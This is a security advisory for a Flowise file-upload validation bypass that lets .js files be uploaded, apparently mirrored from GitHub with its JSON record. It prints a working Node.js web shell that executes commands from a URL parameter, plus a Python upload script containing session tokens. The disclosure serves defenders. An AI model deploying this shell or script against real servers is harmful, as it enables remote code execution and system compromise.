GHSA-RH7V-6W34-W2RR

Vulnerability from github – Published: 2026-04-16 21:49 – Updated: 2026-04-16 21:49
VLAI?
Summary
Flowise: File Upload Validation Bypass in createAttachment
Details

Summary

In FlowiseAI, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).

Details

This is a bypass of GHSA‑35g6‑rrw3‑v6xc (CVE‑2025‑61687). The Chatflow file upload settings do not properly validate MIME types. An attacker can add the application/javascript MIME type when updating a Chatflow, allowing .js files to be uploaded.

JavaScript files are not listed as an option for file upload types within web user interface: Screenshot 2026-01-08 152306

PoC

shell.js (Node.js Web Shell)

const { exec } = require('child_process');
const http = require('http');

const server = http.createServer((req, res) => {
    const url = new URL(req.url, 'http://localhost');
    const cmd = url.searchParams.get('cmd');

    if (cmd) {
        console.log(`Executing: ${cmd}`);
        exec(cmd, (error, stdout, stderr) => {
            res.writeHead(200, {'Content-Type': 'text/plain'});
            if (error) {
                res.end(`Error: ${error.message}\n${stderr || ''}`);
            } else {
                res.end(stdout || 'Command executed successfully');
            }
        });
    } else {
        res.writeHead(200, {'Content-Type': 'text/html'});
        res.end(`
            <h1>Node.js Web Shell</h1>
            <p>Use ?cmd=command to execute</p>
            <p>Example: ?cmd=id</p>
        `);
    }
});

const PORT = 8888;
server.listen(PORT, '0.0.0.0', () => {
    console.log(`Shell running on port ${PORT}`);
    console.log(`Access: http://localhost:${PORT}?cmd=id`);
});

Python Upload Script

import requests
import uuid

TARGET_URL = "http://192.168.236.131:3000"
CHATFLOW_ID = "dfd67fff-23b5-4f62-a0b3-59963cabc3b2"
cookie_str = 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOTRiOGY2MTIyMzI3ZmFmODg0YzM4OGM4Y2YwZTg3ZGU6MTVkNDc4MDFjNTQ0N2Q3NDU2Mzg3OWE2N2E5YmJjNmM0M2JiYjYzNDE0Y2MzZWY2ZThkYjAzZTRhNjM3MjBiNzA5NmI3YmIwMGM3YWI3YTRmM2QzN2E2OTRiMGVmY2UzOTFiZGU3MWJiNWViZDIyN2ZhNzc0NmQ0ZjFmNTM5NTFhOGJkNjdlMzEyZjMzOTk5OWQ0ZGNkYmVmYWU3OWI4NSIsImlhdCI6MTc2Nzg1ODE2NSwibmJmIjoxNzY3ODU4MTY1LCJleHAiOjE3Njc4NjE3NjUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.lUtIFztKIT6Ld8cnPaPnPfm0B47yhurPJRW6JhtSwu8; refreshToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOThmZGE5YWE2MDZhYTA3YTMxYjZlYzhjZTkyMmZkMDA6ZTU2ZTczMTEwYjY3ZDE3ZTM3MjViZWI2YzMyYWYzNTNkOWExNzIzZWU0NzdiN2ZiMDQ1N2Q0M2JmZTY0NTIxZTlkNjM2ZWQwODgxNWJiNzU4Mjg2ZDQ3OGMwNTA3NTRkZTgwMWIwODljNDQ5YjhhZjVkODU2YWFiMzk4NTBjNjNlZjRmY2UzMmY4YWYzZmQxNGQzMmVhYzVhYjVmM2NjZCIsImlhdCI6MTc2Nzg1MzU4NSwibmJmIjoxNzY3ODUzNTg1LCJleHAiOjE3NzU2Mjk1ODUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.U3mm0ONOeGFP1gD-mPT90Iz_Ewwf-YXzmTPwoOEHG_g; connect.sid=s%3Avwp7SDKi02Mzu_nTF3-IZ-RfgmMnnp5o.K7kb5eg9CJ%2FuxupG4rJrT6I0fu0H93OTd5trNC0u88Y'
js_mime_type = 'application/javascript'
CHAT_ID = str(uuid.uuid4())

def configure_chatflow_uploadfile():
    url = f"{TARGET_URL}/api/v1/chatflows/{CHATFLOW_ID}"
    headers = {'Cookie': cookie_str, 'x-request-from': 'internal'}
    chatbot_configdata = {"chatbotConfig":'{\"fullFileUpload\":{\"status\":true,\"allowedUploadFileTypes\":\"' + js_mime_type + ',text/css,text/csv,text/html,application/json,text/markdown,application/x-yaml,application/pdf,application/sql,text/plain,application/xml,application/msword,application/vnd.openxmlformats-officedocument.wordprocessingml.document,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,application/vnd.openxmlformats-officedocument.presentationml.presentation\",\"pdfFile\":{\"usage\":\"perPage\",\"legacyBuild\":false}}}'}
    r = requests.put(url, headers=headers, json = chatbot_configdata)

    if js_mime_type in r.text:
        print("[+] Enabled .js file uploads")
    else:
        print("[-] Failed to enable .js file uploads")

def upload_shell():
    url = f"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}"
    headers = {'Cookie': cookie_str}
    files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')}
    r = requests.post(url, headers=headers, files=files)

    if r.status_code == 200:
        print("[+] Upload success")
        print(r.text)
    else:
        print(f"[-] Upload failed ({r.status_code})")
        print(r.text)

if __name__ == "__main__":
    configure_chatflow_uploadfile()
    upload_shell()

image

Impact

An attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.

Severity ?
7.1 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-434"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:49:28Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nIn FlowiseAI, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn\u2019t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).\n\n### Details\nThis is a bypass of [GHSA\u201135g6\u2011rrw3\u2011v6xc](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc) (CVE\u20112025\u201161687). The Chatflow file upload settings do not properly validate MIME types. An attacker can add the `application/javascript` MIME type when updating a Chatflow, allowing .js files to be uploaded.\n\nJavaScript files are not listed as an option for file upload types within web user interface:\n\u003cimg width=\"1162\" height=\"440\" alt=\"Screenshot 2026-01-08 152306\" src=\"https://github.com/user-attachments/assets/f33f04af-877e-4aac-95a7-86d4684891de\" /\u003e\n\n\n\n### PoC\n#### shell.js (Node.js Web Shell)\n```\nconst { exec } = require(\u0027child_process\u0027);\nconst http = require(\u0027http\u0027);\n\nconst server = http.createServer((req, res) =\u003e {\n    const url = new URL(req.url, \u0027http://localhost\u0027);\n    const cmd = url.searchParams.get(\u0027cmd\u0027);\n\n    if (cmd) {\n        console.log(`Executing: ${cmd}`);\n        exec(cmd, (error, stdout, stderr) =\u003e {\n            res.writeHead(200, {\u0027Content-Type\u0027: \u0027text/plain\u0027});\n            if (error) {\n                res.end(`Error: ${error.message}\\n${stderr || \u0027\u0027}`);\n            } else {\n                res.end(stdout || \u0027Command executed successfully\u0027);\n            }\n        });\n    } else {\n        res.writeHead(200, {\u0027Content-Type\u0027: \u0027text/html\u0027});\n        res.end(`\n            \u003ch1\u003eNode.js Web Shell\u003c/h1\u003e\n            \u003cp\u003eUse ?cmd=command to execute\u003c/p\u003e\n            \u003cp\u003eExample: ?cmd=id\u003c/p\u003e\n        `);\n    }\n});\n\nconst PORT = 8888;\nserver.listen(PORT, \u00270.0.0.0\u0027, () =\u003e {\n    console.log(`Shell running on port ${PORT}`);\n    console.log(`Access: http://localhost:${PORT}?cmd=id`);\n});\n```\n\n#### Python Upload Script\n```\nimport requests\nimport uuid\n\nTARGET_URL = \"http://192.168.236.131:3000\"\nCHATFLOW_ID = \"dfd67fff-23b5-4f62-a0b3-59963cabc3b2\"\ncookie_str = \u0027token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOTRiOGY2MTIyMzI3ZmFmODg0YzM4OGM4Y2YwZTg3ZGU6MTVkNDc4MDFjNTQ0N2Q3NDU2Mzg3OWE2N2E5YmJjNmM0M2JiYjYzNDE0Y2MzZWY2ZThkYjAzZTRhNjM3MjBiNzA5NmI3YmIwMGM3YWI3YTRmM2QzN2E2OTRiMGVmY2UzOTFiZGU3MWJiNWViZDIyN2ZhNzc0NmQ0ZjFmNTM5NTFhOGJkNjdlMzEyZjMzOTk5OWQ0ZGNkYmVmYWU3OWI4NSIsImlhdCI6MTc2Nzg1ODE2NSwibmJmIjoxNzY3ODU4MTY1LCJleHAiOjE3Njc4NjE3NjUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.lUtIFztKIT6Ld8cnPaPnPfm0B47yhurPJRW6JhtSwu8; refreshToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOThmZGE5YWE2MDZhYTA3YTMxYjZlYzhjZTkyMmZkMDA6ZTU2ZTczMTEwYjY3ZDE3ZTM3MjViZWI2YzMyYWYzNTNkOWExNzIzZWU0NzdiN2ZiMDQ1N2Q0M2JmZTY0NTIxZTlkNjM2ZWQwODgxNWJiNzU4Mjg2ZDQ3OGMwNTA3NTRkZTgwMWIwODljNDQ5YjhhZjVkODU2YWFiMzk4NTBjNjNlZjRmY2UzMmY4YWYzZmQxNGQzMmVhYzVhYjVmM2NjZCIsImlhdCI6MTc2Nzg1MzU4NSwibmJmIjoxNzY3ODUzNTg1LCJleHAiOjE3NzU2Mjk1ODUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.U3mm0ONOeGFP1gD-mPT90Iz_Ewwf-YXzmTPwoOEHG_g; connect.sid=s%3Avwp7SDKi02Mzu_nTF3-IZ-RfgmMnnp5o.K7kb5eg9CJ%2FuxupG4rJrT6I0fu0H93OTd5trNC0u88Y\u0027\njs_mime_type = \u0027application/javascript\u0027\nCHAT_ID = str(uuid.uuid4())\n\ndef configure_chatflow_uploadfile():\n    url = f\"{TARGET_URL}/api/v1/chatflows/{CHATFLOW_ID}\"\n    headers = {\u0027Cookie\u0027: cookie_str, \u0027x-request-from\u0027: \u0027internal\u0027}\n    chatbot_configdata = {\"chatbotConfig\":\u0027{\\\"fullFileUpload\\\":{\\\"status\\\":true,\\\"allowedUploadFileTypes\\\":\\\"\u0027 + js_mime_type + \u0027,text/css,text/csv,text/html,application/json,text/markdown,application/x-yaml,application/pdf,application/sql,text/plain,application/xml,application/msword,application/vnd.openxmlformats-officedocument.wordprocessingml.document,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,application/vnd.openxmlformats-officedocument.presentationml.presentation\\\",\\\"pdfFile\\\":{\\\"usage\\\":\\\"perPage\\\",\\\"legacyBuild\\\":false}}}\u0027}\n    r = requests.put(url, headers=headers, json = chatbot_configdata)\n\n    if js_mime_type in r.text:\n        print(\"[+] Enabled .js file uploads\")\n    else:\n        print(\"[-] Failed to enable .js file uploads\")\n\ndef upload_shell():\n    url = f\"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}\"\n    headers = {\u0027Cookie\u0027: cookie_str}\n    files = {\u0027files\u0027: (\u0027shell.js\u0027, open(\u0027shell.js\u0027, \u0027rb\u0027), \u0027application/javascript\u0027)}\n    r = requests.post(url, headers=headers, files=files)\n\n    if r.status_code == 200:\n        print(\"[+] Upload success\")\n        print(r.text)\n    else:\n        print(f\"[-] Upload failed ({r.status_code})\")\n        print(r.text)\n\nif __name__ == \"__main__\":\n    configure_chatflow_uploadfile()\n    upload_shell()\n```\n\u003cimg width=\"839\" height=\"231\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0d2e8384-8da6-4ada-a81a-a85c49476673\" /\u003e\n\n\n### Impact\nAn attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.",
  "id": "GHSA-rh7v-6w34-w2rr",
  "modified": "2026-04-16T21:49:28Z",
  "published": "2026-04-16T21:49:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise: File Upload Validation Bypass in createAttachment"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.